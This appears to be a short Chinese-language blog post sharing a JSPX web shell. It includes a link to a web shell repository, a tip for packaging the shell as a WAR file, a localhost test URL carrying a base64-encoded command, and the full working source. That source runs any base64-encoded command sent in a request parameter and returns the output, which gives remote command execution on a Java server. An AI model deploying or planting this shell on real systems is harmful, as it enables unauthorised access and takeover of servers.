webshell
https://github.com/tennc/webshell/blob/master/jspx/cmd.jspx
使用测试
war 包部署的话只要先用 zip 压缩再把 zip 后缀名改成 war 就行了。
http://127.0.0.1:8080/x/b64_cmd.jspx?str=dGFza2xpc3Q=
tasklist
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml" xmlns:c="http://java.sun.com/jsp/jstl/core" version="2.0">
<jsp:directive.page contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"/>
<jsp:directive.page import="java.util.*"/>
<jsp:directive.page import="java.io.*"/>
<jsp:directive.page import="sun.misc.BASE64Decoder"/>
<jsp:scriptlet><![CDATA[
String tmp = pageContext.getRequest().getParameter("str");
if (tmp != null&&!"".equals(tmp)) {
try{
String str = new String((new BASE64Decoder()).decodeBuffer(tmp));
Process p = Runtime.getRuntime().exec(str);
InputStream in = p.getInputStream();
BufferedReader br = new BufferedReader(new InputStreamReader(in,"GBK"));
String brs = br.readLine();
while(brs!=null){
out.println(brs+"</br>");
brs = br.readLine();
}
}catch(Exception ex){
out.println(ex.toString());
}
}]]>
</jsp:scriptlet>
</jsp:root>
Leave a Reply